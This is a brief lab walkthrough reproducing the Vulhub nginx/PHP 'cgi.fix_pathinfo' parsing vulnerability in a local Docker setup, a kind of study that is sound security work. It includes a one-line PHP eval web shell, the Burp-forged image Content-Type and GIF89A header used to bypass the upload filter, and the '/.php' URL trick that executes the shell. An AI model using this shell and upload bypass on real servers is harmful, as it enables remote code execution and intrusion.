Nginx scapegoating parsing vulnerability
Article directory
1 Interpretation of online vulnerabilities:
https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/
2 Environment setup
cd /home/kali/vulhub/nginx/nginx_parsing_vulnerability
start up:
sudo docker-compose up -d
sudo docker-compose ps -a
sudo docker ps -a
Started: access port 18080
3 affected versions:
Version information:
- Nginx 1.x latest version
- PHP 7.x latest version
4 Vulnerability recurrence
4.1 Access page
Visit pagehttp://192.168.225.166:18080/
4.2 Upload files
<?php @eval($_REQUEST[777]);phpinfo();?> # 1.php文件内容
4.3 Upload failed
4.4 Use bp to analyze the package
Use bp to modify the request parameter suffix, content type, and content header type. If the upload is successful, the uploaded file location will be returned.
Content-Type: image/png
GIF89A
4.5 Access the returned image location
192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png
4.6 Tips for executing PHP code - adding image suffix./php
http://192.168.225.166:18080/uploadfiles/4a47a0db6e60853dedfcfdf08a5ca249.png/.php
4.7 Analysis of the reasons--"cgi.fix_pathinfo-"on will execute the png image as a php script after it is turned on
